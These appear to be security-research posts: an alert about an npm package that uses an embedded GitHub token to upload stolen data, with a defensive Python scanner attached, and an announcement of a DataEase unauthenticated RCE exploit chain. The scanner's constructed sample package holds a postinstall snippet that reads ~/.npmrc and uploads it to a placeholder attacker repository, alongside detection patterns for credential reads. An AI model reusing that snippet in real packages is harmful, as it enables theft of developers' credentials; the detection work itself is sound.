🚨 NPM Malware-slop Alert!🚨
We detected and reported a malware-slop package to npm - the malware uses its OWN PRIVATE GitHub token, which is EMBEDDED INSIDE the malware itself - to read sensitive information and upload it to the threat actor's GitHub repository.
The malware is still live on npm -
The threat actor's GitHub page was opened 5h ago -
Detailed report will be published tomorrow.
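As a defender's check for the pattern described above (a credential hard-coded in the package that is then used to push data to a GitHub repository), here is an added Python example. It is not the reporting team's tool and not code from the malicious package: it scans the files of a constructed npm package for GitHub token prefixes, GitHub Contents API upload paths, reads of local credential files, and install-time hooks in package.json. The package name, token value and repository path are constructed placeholders.

```python
import json
import re
from dataclasses import dataclass

# Hypothetical scanner written for this example; not the reporting team's tooling.
# GitHub token prefixes (ghp_/gho_/ghu_/ghs_/ghr_ and github_pat_) are public formats.
TOKEN_PATTERNS = {
    "classic": re.compile(r"\bgh[pousr]_[A-Za-z0-9]{36}\b"),
    "fine_grained": re.compile(r"\bgithub_pat_[A-Za-z0-9]{22}_[A-Za-z0-9]{59}\b"),
}
# Signs that data is pushed to a GitHub repo (Contents API: PUT /repos/{owner}/{repo}/contents/{path}).
EXFIL_PATTERNS = [
    re.compile(r"api\.github\.com"),
    re.compile(r"/repos/[^/\s\"']+/[^/\s\"']+/contents/"),
]
# Local secrets an install-time script has no business reading.
SENSITIVE_PATTERNS = [re.compile(r"\.ssh"), re.compile(r"\.npmrc"), re.compile(r"process\.env")]
INSTALL_HOOKS = ("preinstall", "install", "postinstall")


@dataclass
class Finding:
    path: str
    kind: str
    detail: str


def scan_file(path: str, text: str) -> list[Finding]:
    """Flag embedded tokens (redacted), upload indicators and sensitive reads in one file."""
    findings = []
    for name, pat in TOKEN_PATTERNS.items():
        for m in pat.finditer(text):
            findings.append(Finding(path, "github_token", f"{name}: {m.group(0)[:8]}..."))
    for pat in EXFIL_PATTERNS:
        if pat.search(text):
            findings.append(Finding(path, "exfil_indicator", pat.pattern))
    for pat in SENSITIVE_PATTERNS:
        if pat.search(text):
            findings.append(Finding(path, "sensitive_read", pat.pattern))
    return findings


def scan_package(files: dict[str, str]) -> list[Finding]:
    """files maps a path inside the package tarball to its text content."""
    findings = []
    for path, text in files.items():
        findings.extend(scan_file(path, text))
    manifest = files.get("package.json")
    if manifest:
        try:
            scripts = json.loads(manifest).get("scripts", {})
        except json.JSONDecodeError:
            scripts = {}
        for hook in INSTALL_HOOKS:
            if hook in scripts:
                findings.append(Finding("package.json", "install_hook", f"{hook}: {scripts[hook]}"))
    return findings


def summarize(findings: list[Finding]) -> dict[str, int]:
    counts: dict[str, int] = {}
    for f in findings:
        counts[f.kind] = counts.get(f.kind, 0) + 1
    return counts


def looks_like_token_exfil(findings: list[Finding]) -> bool:
    """The combination that matches the reported behaviour: a token plus an upload path."""
    kinds = {f.kind for f in findings}
    return "github_token" in kinds and "exfil_indicator" in kinds


# Constructed sample package (placeholder names and a fake token, not real IoCs).
FAKE_TOKEN = "ghp_" + "X" * 36
SAMPLE_PACKAGE = {
    "package.json": json.dumps({"name": "placeholder-utils", "version": "1.0.0",
                                "scripts": {"postinstall": "node index.js"}}),
    "index.js": (
        f'const token = "{FAKE_TOKEN}";\n'
        "const fs = require('fs');\n"
        "const data = fs.readFileSync(process.env.HOME + '/.npmrc');\n"
        "fetch('https://api.github.com/repos/attacker-placeholder/loot/contents/' + name,\n"
        "      {method: 'PUT', headers: {Authorization: 'token ' + token}});\n"
    ),
}

if __name__ == "__main__":
    results = scan_package(SAMPLE_PACKAGE)
    for f in results:
        print(f"{f.path}: {f.kind} ({f.detail})")
    print("token-backed exfiltration pattern:", looks_like_token_exfil(results))
```

In practice you would feed `scan_package` the extracted contents of the tarball fetched with `npm pack`, and treat a token plus a Contents API path plus an install hook as a block-before-install signal rather than a mere warning.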
4-Vulnerability Exploit Chain in DataEase
My team found a 4-vulnerability exploit chain allowing unauthenticated RCE on DataEase.
Combined with a previously published vulnerability (CVE-2026-23958), these new vulns complete the attack chain: a JDBC bypass, SQL injection, and a Quartz scheduler injection that runs periodically and executes a crafted payload on the machine.
We also have a video showing the exploit PoC in action :)
Read the full blog: